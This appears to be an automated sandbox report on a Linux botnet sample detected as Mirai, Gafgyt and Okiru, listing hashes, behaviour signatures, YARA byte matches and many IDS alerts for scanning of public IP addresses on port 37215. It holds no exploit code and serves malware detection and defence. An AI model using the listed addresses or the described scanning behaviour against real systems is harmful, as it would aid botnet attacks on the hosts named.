Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
c0m5xRfolz.elf

Overview

General Information

Sample name:c0m5xRfolz.elf
renamed because original name is a hash value
Original sample name:c7ff460b4769a7ebab77c47d6d35d714.elf
Analysis ID:1515013
MD5:c7ff460b4769a7ebab77c47d6d35d714
SHA1:e802df9600d917e590179517449068a25e294394
SHA256:1d97297ada97494ead26feebfd84f6a7ce16ad6cc54e1ac2a01f640b0ce7685a
Tags:32elfmirairenesas
Infos:

Detection

Gafgyt, Mirai, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Gafgyt
Yara detected Mirai
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1515013
Start date and time:2024-09-21 15:20:04 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 3s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:c0m5xRfolz.elf
renamed because original name is a hash value
Original Sample Name:c7ff460b4769a7ebab77c47d6d35d714.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@100/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Reached maximum number of 1000 Suricata alerts, please consult the 'Suricata Logs'
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/c0m5xRfolz.elf
PID:5490
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5506, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5506, Parent: 1383, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • xfdesktop (PID: 5510, Parent: 3011, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 21e3a5141-81ff-45e8-a564-651b5b7002ba
  • xfdesktop (PID: 5519, Parent: 3011, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 21e3a5141-81ff-45e8-a564-651b5b7002ba
  • gdm3 New Fork (PID: 5521, Parent: 1289)
  • Default (PID: 5521, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5538, Parent: 1289)
  • Default (PID: 5538, Parent: 1289, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • xfdesktop (PID: 5543, Parent: 3011, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 21e3a5141-81ff-45e8-a564-651b5b7002ba
  • xfdesktop (PID: 5549, Parent: 3011, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 21e3a5141-81ff-45e8-a564-651b5b7002ba
  • systemd New Fork (PID: 5552, Parent: 1)
  • systemd-user-runtime-dir (PID: 5552, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127
  • xfdesktop (PID: 5560, Parent: 3011, MD5: dfb13e1581f80065dcea16f2476f16f2) Arguments: xfdesktop --display :1.0 --sm-client-id 21e3a5141-81ff-45e8-a564-651b5b7002ba
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Bashlite, GafgytBashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
c0m5xRfolz.elfJoeSecurity_GafgytYara detected GafgytJoe Security
    c0m5xRfolz.elfJoeSecurity_OkiruYara detected OkiruJoe Security
      c0m5xRfolz.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        c0m5xRfolz.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          c0m5xRfolz.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x19890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x198a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x198b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x198cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x198e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x198f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19908:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1991c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19930:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19944:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19958:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x1996c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19980:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19994:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x199a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x199bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x199d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x199e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x199f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19a0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x19a20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmpJoeSecurity_GafgytYara detected GafgytJoe Security
            5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
              5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
                5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
                  5490.1.00007f56cc400000.00007f56cc41d000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
                  • 0x19890:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x198a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x198b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x198cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x198e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x198f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19908:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x1991c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19930:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19944:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19958:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x1996c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19980:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19994:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x199a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x199bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x199d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x199e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x199f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19a0c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  • 0x19a20:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
                  Click to see the 6 entries
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-21T15:20:53.344358+020028352221A Network Trojan was detected192.168.2.145152478.175.246.17937215TCP
                  2024-09-21T15:21:01.866066+020028352221A Network Trojan was detected192.168.2.144635485.104.13.16837215TCP
                  2024-09-21T15:21:01.977631+020028352221A Network Trojan was detected192.168.2.144025088.252.137.2637215TCP
                  2024-09-21T15:21:03.048236+020028352221A Network Trojan was detected192.168.2.1447416197.8.17.16637215TCP
                  2024-09-21T15:21:06.581977+020028352221A Network Trojan was detected192.168.2.144803441.78.26.20637215TCP
                  2024-09-21T15:21:12.750419+020028352221A Network Trojan was detected192.168.2.1434286197.237.191.1637215TCP
                  2024-09-21T15:21:12.764666+020028352221A Network Trojan was detected192.168.2.145660641.52.148.25537215TCP
                  2024-09-21T15:21:12.765123+020028352221A Network Trojan was detected192.168.2.1448538181.43.141.4037215TCP
                  2024-09-21T15:21:12.765204+020028352221A Network Trojan was detected192.168.2.1453482217.215.170.11337215TCP
                  2024-09-21T15:21:12.796228+020028352221A Network Trojan was detected192.168.2.1440950157.81.140.21137215TCP
                  2024-09-21T15:21:12.796996+020028352221A Network Trojan was detected192.168.2.143483041.160.68.20437215TCP
                  2024-09-21T15:21:12.828427+020028352221A Network Trojan was detected192.168.2.1453722197.22.102.5437215TCP
                  2024-09-21T15:21:12.874617+020028352221A Network Trojan was detected192.168.2.1444270163.220.137.2437215TCP
                  2024-09-21T15:21:12.880154+020028352221A Network Trojan was detected192.168.2.1460718197.46.158.6737215TCP
                  2024-09-21T15:21:12.890353+020028352221A Network Trojan was detected192.168.2.1453434197.255.200.4137215TCP
                  2024-09-21T15:21:12.890817+020028352221A Network Trojan was detected192.168.2.144589086.66.209.17637215TCP
                  2024-09-21T15:21:12.905982+020028352221A Network Trojan was detected192.168.2.1436750197.141.214.5037215TCP
                  2024-09-21T15:21:12.909853+020028352221A Network Trojan was detected192.168.2.144296841.47.174.14937215TCP
                  2024-09-21T15:21:12.921574+020028352221A Network Trojan was detected192.168.2.145216641.15.250.5837215TCP
                  2024-09-21T15:21:12.941507+020028352221A Network Trojan was detected192.168.2.146071041.17.4.23537215TCP
                  2024-09-21T15:21:12.952788+020028352221A Network Trojan was detected192.168.2.145093845.245.176.3837215TCP
                  2024-09-21T15:21:12.968634+020028352221A Network Trojan was detected192.168.2.144710842.35.195.12637215TCP
                  2024-09-21T15:21:12.985586+020028352221A Network Trojan was detected192.168.2.1437416141.200.4.19837215TCP
                  2024-09-21T15:21:13.000695+020028352221A Network Trojan was detected192.168.2.1460778197.40.208.14237215TCP
                  2024-09-21T15:21:13.001072+020028352221A Network Trojan was detected192.168.2.1439058157.112.115.18237215TCP
                  2024-09-21T15:21:13.003310+020028352221A Network Trojan was detected192.168.2.1435686157.192.147.1837215TCP
                  2024-09-21T15:21:13.031559+020028352221A Network Trojan was detected192.168.2.1432932197.65.101.17937215TCP
                  2024-09-21T15:21:13.061991+020028352221A Network Trojan was detected192.168.2.1455978123.9.212.5737215TCP
                  2024-09-21T15:21:13.062104+020028352221A Network Trojan was detected192.168.2.145906041.133.30.2437215TCP
                  2024-09-21T15:21:13.062642+020028352221A Network Trojan was detected192.168.2.1443560197.95.87.15137215TCP
                  2024-09-21T15:21:13.063683+020028352221A Network Trojan was detected192.168.2.144323241.163.251.1437215TCP
                  2024-09-21T15:21:13.079603+020028352221A Network Trojan was detected192.168.2.1454482197.42.220.6737215TCP
                  2024-09-21T15:21:13.124085+020028352221A Network Trojan was detected192.168.2.143404641.0.235.24837215TCP
                  2024-09-21T15:21:13.124415+020028352221A Network Trojan was detected192.168.2.1444932197.139.234.4437215TCP
                  2024-09-21T15:21:13.125165+020028352221A Network Trojan was detected192.168.2.1460744157.58.10.737215TCP
                  2024-09-21T15:21:13.144061+020028352221A Network Trojan was detected192.168.2.144436841.38.220.17337215TCP
                  2024-09-21T15:21:13.187733+020028352221A Network Trojan was detected192.168.2.1432932157.121.209.16337215TCP
                  2024-09-21T15:21:13.222124+020028352221A Network Trojan was detected192.168.2.145063846.200.188.2537215TCP
                  2024-09-21T15:21:13.237718+020028352221A Network Trojan was detected192.168.2.1453152169.177.66.5237215TCP
                  2024-09-21T15:21:13.249119+020028352221A Network Trojan was detected192.168.2.1457752197.190.171.21837215TCP
                  2024-09-21T15:21:13.270885+020028352221A Network Trojan was detected192.168.2.1458574157.76.12.8937215TCP
                  2024-09-21T15:21:13.282545+020028352221A Network Trojan was detected192.168.2.1458358197.203.234.23837215TCP
                  2024-09-21T15:21:13.286321+020028352221A Network Trojan was detected192.168.2.1438124197.191.64.22837215TCP
                  2024-09-21T15:21:13.297177+020028352221A Network Trojan was detected192.168.2.144452241.206.215.12737215TCP
                  2024-09-21T15:21:13.301987+020028352221A Network Trojan was detected192.168.2.146051241.0.124.22837215TCP
                  2024-09-21T15:21:13.812247+020028352221A Network Trojan was detected192.168.2.1442672197.19.102.14937215TCP
                  2024-09-21T15:21:13.814041+020028352221A Network Trojan was detected192.168.2.145941041.38.89.25237215TCP
                  2024-09-21T15:21:13.927215+020028352221A Network Trojan was detected192.168.2.1440832197.253.44.12337215TCP
                  2024-09-21T15:21:13.936839+020028352221A Network Trojan was detected192.168.2.144387249.148.16.17937215TCP
                  2024-09-21T15:21:13.954332+020028352221A Network Trojan was detected192.168.2.146035441.97.220.17737215TCP
                  2024-09-21T15:21:13.956344+020028352221A Network Trojan was detected192.168.2.145166636.89.146.4137215TCP
                  2024-09-21T15:21:14.005544+020028352221A Network Trojan was detected192.168.2.144596041.164.156.2837215TCP
                  2024-09-21T15:21:14.015185+020028352221A Network Trojan was detected192.168.2.1444952157.137.42.1537215TCP
                  2024-09-21T15:21:14.081427+020028352221A Network Trojan was detected192.168.2.1448924157.190.126.18837215TCP
                  2024-09-21T15:21:14.124561+020028352221A Network Trojan was detected192.168.2.1442340197.202.85.6137215TCP
                  2024-09-21T15:21:14.126192+020028352221A Network Trojan was detected192.168.2.1444002197.180.198.23937215TCP
                  2024-09-21T15:21:14.130716+020028352221A Network Trojan was detected192.168.2.1432816197.74.61.20537215TCP
                  2024-09-21T15:21:14.130743+020028352221A Network Trojan was detected192.168.2.145206271.104.234.23737215TCP
                  2024-09-21T15:21:14.130901+020028352221A Network Trojan was detected192.168.2.1451374197.236.227.3437215TCP
                  2024-09-21T15:21:14.157394+020028352221A Network Trojan was detected192.168.2.1460654157.97.58.22437215TCP
                  2024-09-21T15:21:14.172943+020028352221A Network Trojan was detected192.168.2.1447806106.56.6.19037215TCP
                  2024-09-21T15:21:14.202683+020028352221A Network Trojan was detected192.168.2.1443240197.99.193.18137215TCP
                  2024-09-21T15:21:14.249534+020028352221A Network Trojan was detected192.168.2.1447404197.226.110.21337215TCP
                  2024-09-21T15:21:14.251219+020028352221A Network Trojan was detected192.168.2.1440056157.143.91.21337215TCP
                  2024-09-21T15:21:14.264425+020028352221A Network Trojan was detected192.168.2.144065041.65.240.17437215TCP
                  2024-09-21T15:21:14.281645+020028352221A Network Trojan was detected192.168.2.145032841.140.67.18437215TCP
                  2024-09-21T15:21:14.298222+020028352221A Network Trojan was detected192.168.2.1452004197.176.196.15137215TCP
                  2024-09-21T15:21:14.968937+020028352221A Network Trojan was detected192.168.2.1449776159.254.124.24037215TCP
                  2024-09-21T15:21:15.764891+020028352221A Network Trojan was detected192.168.2.1434636157.149.31.23637215TCP
                  2024-09-21T15:21:15.827333+020028352221A Network Trojan was detected192.168.2.14443805.97.26.13037215TCP
                  2024-09-21T15:21:15.828610+020028352221A Network Trojan was detected192.168.2.143873841.10.100.1237215TCP
                  2024-09-21T15:21:15.922362+020028352221A Network Trojan was detected192.168.2.1452050197.176.140.19137215TCP
                  2024-09-21T15:21:15.940802+020028352221A Network Trojan was detected192.168.2.144687641.49.2.4537215TCP
                  2024-09-21T15:21:15.952632+020028352221A Network Trojan was detected192.168.2.1447736157.81.182.14437215TCP
                  2024-09-21T15:21:16.000078+020028352221A Network Trojan was detected192.168.2.1454648157.5.43.16937215TCP
                  2024-09-21T15:21:16.003818+020028352221A Network Trojan was detected192.168.2.1447848157.250.77.1937215TCP
                  2024-09-21T15:21:16.005724+020028352221A Network Trojan was detected192.168.2.145997241.41.190.11337215TCP
                  2024-09-21T15:21:16.066896+020028352221A Network Trojan was detected192.168.2.1455314112.145.216.3737215TCP
                  2024-09-21T15:21:16.081385+020028352221A Network Trojan was detected192.168.2.143629625.157.102.1337215TCP
                  2024-09-21T15:21:16.124502+020028352221A Network Trojan was detected192.168.2.145496841.55.24.14837215TCP
                  2024-09-21T15:21:16.173179+020028352221A Network Trojan was detected192.168.2.143730441.178.43.5137215TCP
                  2024-09-21T15:21:16.196332+020028352221A Network Trojan was detected192.168.2.144147839.34.170.22637215TCP
                  2024-09-21T15:21:16.204262+020028352221A Network Trojan was detected192.168.2.1449702157.68.62.12537215TCP
                  2024-09-21T15:21:16.269359+020028352221A Network Trojan was detected192.168.2.1437180157.105.209.7937215TCP
                  2024-09-21T15:21:16.428753+020028352221A Network Trojan was detected192.168.2.1454534157.62.186.12237215TCP
                  2024-09-21T15:21:16.428768+020028352221A Network Trojan was detected192.168.2.144595841.169.185.21837215TCP
                  2024-09-21T15:21:16.428770+020028352221A Network Trojan was detected192.168.2.1437182197.136.165.19237215TCP
                  2024-09-21T15:21:16.428783+020028352221A Network Trojan was detected192.168.2.144273241.148.39.6537215TCP
                  2024-09-21T15:21:16.428783+020028352221A Network Trojan was detected192.168.2.1459798157.61.214.13737215TCP
                  2024-09-21T15:21:16.428797+020028352221A Network Trojan was detected192.168.2.144660087.1.86.16037215TCP
                  2024-09-21T15:21:16.428797+020028352221A Network Trojan was detected192.168.2.144401841.54.87.1737215TCP
                  2024-09-21T15:21:16.428803+020028352221A Network Trojan was detected192.168.2.143605441.15.47.20937215TCP
                  2024-09-21T15:21:16.428803+020028352221A Network Trojan was detected192.168.2.1449794197.83.28.18637215TCP
                  2024-09-21T15:21:16.428813+020028352221A Network Trojan was detected192.168.2.1459822157.56.184.8637215TCP
                  2024-09-21T15:21:16.428813+020028352221A Network Trojan was detected192.168.2.1445418157.112.133.17337215TCP
                  2024-09-21T15:21:16.428825+020028352221A Network Trojan was detected192.168.2.145710041.234.51.10937215TCP
                  2024-09-21T15:21:16.428829+020028352221A Network Trojan was detected192.168.2.146067441.166.112.4037215TCP
                  2024-09-21T15:21:16.428829+020028352221A Network Trojan was detected192.168.2.145251041.192.192.8237215TCP
                  2024-09-21T15:21:16.428838+020028352221A Network Trojan was detected192.168.2.143931041.232.183.13037215TCP
                  2024-09-21T15:21:16.428873+020028352221A Network Trojan was detected192.168.2.145965041.184.195.21237215TCP
                  2024-09-21T15:21:16.428873+020028352221A Network Trojan was detected192.168.2.144437041.8.252.2537215TCP
                  2024-09-21T15:21:16.428873+020028352221A Network Trojan was detected192.168.2.145340041.134.6.6037215TCP
                  2024-09-21T15:21:16.428878+020028352221A Network Trojan was detected192.168.2.146008041.15.61.16737215TCP
                  2024-09-21T15:21:16.428890+020028352221A Network Trojan was detected192.168.2.1447678197.95.57.4137215TCP
                  2024-09-21T15:21:16.428891+020028352221A Network Trojan was detected192.168.2.1440960197.93.42.4537215TCP
                  2024-09-21T15:21:16.428896+020028352221A Network Trojan was detected192.168.2.1445740157.206.41.6637215TCP
                  2024-09-21T15:21:16.428903+020028352221A Network Trojan was detected192.168.2.144861241.32.110.8037215TCP
                  2024-09-21T15:21:16.428906+020028352221A Network Trojan was detected192.168.2.1460462157.187.30.13437215TCP
                  2024-09-21T15:21:16.428910+020028352221A Network Trojan was detected192.168.2.1454008197.124.41.25537215TCP
                  2024-09-21T15:21:16.428919+020028352221A Network Trojan was detected192.168.2.1456842157.205.55.13337215TCP
                  2024-09-21T15:21:16.428925+020028352221A Network Trojan was detected192.168.2.145451841.64.9.6437215TCP
                  2024-09-21T15:21:16.428930+020028352221A Network Trojan was detected192.168.2.1432884197.135.13.17137215TCP
                  2024-09-21T15:21:16.428932+020028352221A Network Trojan was detected192.168.2.1455664157.153.203.7437215TCP
                  2024-09-21T15:21:16.428932+020028352221A Network Trojan was detected192.168.2.1438970157.229.200.2337215TCP
                  2024-09-21T15:21:16.428937+020028352221A Network Trojan was detected192.168.2.1437814129.252.197.5737215TCP
                  2024-09-21T15:21:16.428944+020028352221A Network Trojan was detected192.168.2.144055641.42.121.21037215TCP
                  2024-09-21T15:21:16.428953+020028352221A Network Trojan was detected192.168.2.1445344157.10.113.8237215TCP
                  2024-09-21T15:21:16.428980+020028352221A Network Trojan was detected192.168.2.144299250.190.215.18737215TCP
                  2024-09-21T15:21:16.428988+020028352221A Network Trojan was detected192.168.2.145326892.96.240.3837215TCP
                  2024-09-21T15:21:16.428992+020028352221A Network Trojan was detected192.168.2.1452240197.71.183.17237215TCP
                  2024-09-21T15:21:16.428998+020028352221A Network Trojan was detected192.168.2.1457494157.33.142.24937215TCP
                  2024-09-21T15:21:16.429012+020028352221A Network Trojan was detected192.168.2.1434582157.81.79.18837215TCP
                  2024-09-21T15:21:16.429019+020028352221A Network Trojan was detected192.168.2.145974441.68.180.14137215TCP
                  2024-09-21T15:21:16.429021+020028352221A Network Trojan was detected192.168.2.144774252.61.32.9937215TCP
                  2024-09-21T15:21:16.429029+020028352221A Network Trojan was detected192.168.2.1447040157.37.151.14437215TCP
                  2024-09-21T15:21:16.429043+020028352221A Network Trojan was detected192.168.2.1447388197.211.19.5237215TCP
                  2024-09-21T15:21:16.429044+020028352221A Network Trojan was detected192.168.2.1460084197.33.187.9737215TCP
                  2024-09-21T15:21:16.429044+020028352221A Network Trojan was detected192.168.2.1455296197.48.247.237215TCP
                  2024-09-21T15:21:16.429056+020028352221A Network Trojan was detected192.168.2.1438020104.146.197.13037215TCP
                  2024-09-21T15:21:16.429056+020028352221A Network Trojan was detected192.168.2.1453464120.235.170.1737215TCP
                  2024-09-21T15:21:16.429056+020028352221A Network Trojan was detected192.168.2.144171441.118.64.10937215TCP
                  2024-09-21T15:21:16.429056+020028352221A Network Trojan was detected192.168.2.145584241.125.39.24137215TCP
                  2024-09-21T15:21:16.429075+020028352221A Network Trojan was detected192.168.2.143634832.125.229.25037215TCP
                  2024-09-21T15:21:16.429090+020028352221A Network Trojan was detected192.168.2.1445252206.94.13.23937215TCP
                  2024-09-21T15:21:16.429091+020028352221A Network Trojan was detected192.168.2.145150841.153.68.20937215TCP
                  2024-09-21T15:21:16.429103+020028352221A Network Trojan was detected192.168.2.1437872157.112.180.10437215TCP
                  2024-09-21T15:21:16.429104+020028352221A Network Trojan was detected192.168.2.143691841.207.19.24937215TCP
                  2024-09-21T15:21:16.429105+020028352221A Network Trojan was detected192.168.2.1435724197.65.49.20837215TCP
                  2024-09-21T15:21:16.429127+020028352221A Network Trojan was detected192.168.2.1454810138.224.142.24537215TCP
                  2024-09-21T15:21:16.429127+020028352221A Network Trojan was detected192.168.2.1450000197.151.26.13537215TCP
                  2024-09-21T15:21:16.429129+020028352221A Network Trojan was detected192.168.2.1434468197.67.232.17037215TCP
                  2024-09-21T15:21:16.429129+020028352221A Network Trojan was detected192.168.2.145034831.24.235.12237215TCP
                  2024-09-21T15:21:16.429134+020028352221A Network Trojan was detected192.168.2.145055260.84.71.23137215TCP
                  2024-09-21T15:21:16.429150+020028352221A Network Trojan was detected192.168.2.1447624197.9.67.13537215TCP
                  2024-09-21T15:21:16.429150+020028352221A Network Trojan was detected192.168.2.144913041.8.90.15437215TCP
                  2024-09-21T15:21:16.429150+020028352221A Network Trojan was detected192.168.2.1459058157.184.243.10637215TCP
                  2024-09-21T15:21:16.429164+020028352221A Network Trojan was detected192.168.2.145381241.244.59.17237215TCP
                  2024-09-21T15:21:16.429180+020028352221A Network Trojan was detected192.168.2.1452692203.151.133.1837215TCP
                  2024-09-21T15:21:16.429183+020028352221A Network Trojan was detected192.168.2.144216841.80.163.10137215TCP
                  2024-09-21T15:21:16.429183+020028352221A Network Trojan was detected192.168.2.1434872197.18.153.9037215TCP
                  2024-09-21T15:21:16.429190+020028352221A Network Trojan was detected192.168.2.144499441.167.34.20337215TCP
                  2024-09-21T15:21:16.429199+020028352221A Network Trojan was detected192.168.2.1447092197.39.219.10937215TCP
                  2024-09-21T15:21:16.429221+020028352221A Network Trojan was detected192.168.2.1445474157.175.96.18937215TCP
                  2024-09-21T15:21:16.429224+020028352221A Network Trojan was detected192.168.2.1453632157.168.126.1237215TCP
                  2024-09-21T15:21:16.429232+020028352221A Network Trojan was detected192.168.2.1454022196.121.163.237215TCP
                  2024-09-21T15:21:16.429246+020028352221A Network Trojan was detected192.168.2.145956641.143.225.22337215TCP
